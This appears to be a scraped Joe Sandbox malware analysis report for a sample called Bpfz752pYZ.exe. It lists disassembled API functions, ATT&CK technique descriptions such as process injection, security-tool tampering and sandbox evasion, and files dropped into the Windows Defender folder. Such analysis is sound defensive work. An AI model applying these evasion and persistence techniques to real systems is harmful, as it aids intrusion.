Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: CountTick_snprintf
String ID: %dd %dh %dm
API String ID: 3495410349-3074259717
Opcode ID: 0640c349b482966ac159f99e89a9e93f9b7a32822f268aa3d3c49e345b37afc3
Instruction ID: 40d2b3104a05a57f35212cc7c0754e7d4fd353f4d78f6662d977a8fa07f0f0fe
Opcode Fuzzy Hash: 0640c349b482966ac159f99e89a9e93f9b7a32822f268aa3d3c49e345b37afc3
Instruction Fuzzy Hash: 02F08262B8105457A35C541D6C1AABA594F87C8311B8DC67DFD0ACF3E9DCB49C514290

Function 02C7A820 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7A834
ReleaseMutex.KERNEL32(00000000), ref: 02C7A850

Strings

P0#v, xrefs: 02C7A850

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: MutexObjectReleaseSingleWait
String ID: P0#v
API String ID: 2017088797-3387790918
Opcode ID: 481158786ac46d56176740526b23a3a8955e17810fc96629d63a91feb70789d4
Instruction ID: 957f9616aee886f5acf473ca777cac56d7ab32bc140f39379ed3d1ad4d576afd
Opcode Fuzzy Hash: 481158786ac46d56176740526b23a3a8955e17810fc96629d63a91feb70789d4
Instruction Fuzzy Hash: 50E01275D846489FC706DF58F448B197BA8B758321F008B56F868873A1C774A960CB50

Function 02C7DA00 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000014,00000000,?,?,?,02C7DE7B,00000000,?,?,00000000,Content-Type,?,?,00000000,Referer), ref: 02C7DA3F
HeapAlloc.KERNEL32(00000000,?,02C7DE7B,00000000,?,?,00000000,Content-Type,?,?,00000000,Referer,?), ref: 02C7DA46
memset.MSVCRT ref: 02C7DA56
memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,00000014,?,02C7DE7B,00000000,?,?,00000000,Content-Type,?,?,00000000), ref: 02C7DA61

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcessmemcpymemset
String ID:
API String ID: 471586229-0
Opcode ID: e92818099e0351410444197cd07c409c11ba63b2a236b4055ff852c97ff7d887
Instruction ID: 5eb95878f65c72346972bc3317d04c08cfa5de28d9cf7efa16dcff17412b4f01
Opcode Fuzzy Hash: e92818099e0351410444197cd07c409c11ba63b2a236b4055ff852c97ff7d887
Instruction Fuzzy Hash: 9901F233A852156B86219A69AC44FE7B79CFFC5770F008251FD06DF184D721EA0483E0

Function 02C7E290 Relevance: 5.0, APIs: 4, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,?,02C7E94B,?,?,?), ref: 02C7E2A8
HeapAlloc.KERNEL32(00000000,?,02C7E94B,?,?,?), ref: 02C7E2AF
memset.MSVCRT ref: 02C7E2BF
memcpy.MSVCRT(00000000,?,?,00000000,00000000,?,?,02C7E94B,?,?,?), ref: 02C7E2CA

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcessmemcpymemset
String ID:
API String ID: 471586229-0
Opcode ID: d8de82c6c68c7a200bdb47a3d304783443ba7fb4700a11398772ab85a75e0eb4
Instruction ID: b62f0556ec8815c3ad3f713ae6f7287db69877e0de0a2f1143eff459f65c52f3
Opcode Fuzzy Hash: d8de82c6c68c7a200bdb47a3d304783443ba7fb4700a11398772ab85a75e0eb4
Instruction Fuzzy Hash: D5F05533A0166137C6226A99AC44FCBB75CEFD2760F400260FE00EF280CA20DE0087F1

Function 02C7D390 Relevance: 5.0, APIs: 4, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,7622F380,?,02C7D799,00000000,?,00000000,02C7EAE2), ref: 02C7D3A4
HeapValidate.KERNEL32(00000000), ref: 02C7D3A7
GetProcessHeap.KERNEL32(00000000,?), ref: 02C7D3B4
HeapFree.KERNEL32(00000000), ref: 02C7D3B7

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$FreeValidate
String ID:
API String ID: 1670920773-0
Opcode ID: 121c50ac3785073cf1e822029238d3db2390aeb27431e563befb30a8878f4b53
Instruction ID: b848486a1f158c6433e21d6dcf7b06956120b6300da42dc684efe6e88b722ed3
Opcode Fuzzy Hash: 121c50ac3785073cf1e822029238d3db2390aeb27431e563befb30a8878f4b53
Instruction Fuzzy Hash: E1F06D74E40362ABEB105F39AC48B977BECAF48686F940481E90ED3140E775C910AAA0

Function 02CB1BF0 Relevance: 5.0, APIs: 4, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?), ref: 02CB1C05
HeapValidate.KERNEL32(00000000), ref: 02CB1C08
GetProcessHeap.KERNEL32(00000000,?), ref: 02CB1C15
HeapFree.KERNEL32(00000000), ref: 02CB1C18

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$FreeValidate
String ID:
API String ID: 1670920773-0
Opcode ID: f4fb82d938ff516ed9fc9f7cc597840f4ed41ce2ee13c1e50acb16e997651bc0
Instruction ID: 9aba192d21fd338b10a677a2566ba91084e4345642c3fd3c61d2f9676863cdc5
Opcode Fuzzy Hash: f4fb82d938ff516ed9fc9f7cc597840f4ed41ce2ee13c1e50acb16e997651bc0
Instruction Fuzzy Hash: 2BE08632FC526877C51226A66C0CF877B1CDFC1B72F094411F608D3141C660941096F0

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	Command: Command Execution, Process: Process Creation, User Account: User Account Creation
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
Tactics:	Defense Evasion, Persistence
Data Sources:	Drive: Drive Modification
Platforms:	Linux, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Bpfz752pYZ.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Protection of GUI

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Windows Defender\galynuh.com

C:\Program Files (x86)\Windows Defender\galyqaz.com

C:\Program Files (x86)\Windows Defender\pupydeq.com

C:\Program Files (x86)\Windows Defender\puzylyp.com

C:\Program Files (x86)\Windows Defender\qetyhyg.com

C:\Program Files (x86)\Windows Defender\qexyhuv.com

C:\Program Files (x86)\Windows Defender\vofycot.com

C:\Program Files (x86)\Windows Defender\vojyqem.com

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_NcYLgtXIKJgHj.ex_191ad5ea639312cff7437352e3e5dd3555cd58_1382581b_0ca87790-bd51-413e-ba81-96dde7b94f9c\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_NcYLgtXIKJgHj.ex_191ad5ea639312cff7437352e3e5dd3555cd58_1382581b_1d7f431f-f9cb-4e9c-bfbf-ed80f22385e4\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_NcYLgtXIKJgHj.ex_191ad5ea639312cff7437352e3e5dd3555cd58_1382581b_39b20be6-b6c8-4156-bb27-d8bd9e89fd50\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_NcYLgtXIKJgHj.ex_191ad5ea639312cff7437352e3e5dd3555cd58_1382581b_4d295e18-5df1-40f8-b1ec-09b7d29e22ba\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_NcYLgtXIKJgHj.ex_191ad5ea639312cff7437352e3e5dd3555cd58_1382581b_91456292-83cf-467e-b9c9-41948fe3bc74\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_NcYLgtXIKJgHj.ex_191ad5ea639312cff7437352e3e5dd3555cd58_1382581b_a07a19eb-58aa-4687-9255-fce0ec37e289\Report.wer

Windows Analysis Report
Bpfz752pYZ.exe

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Tactics:	Lateral Movement
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre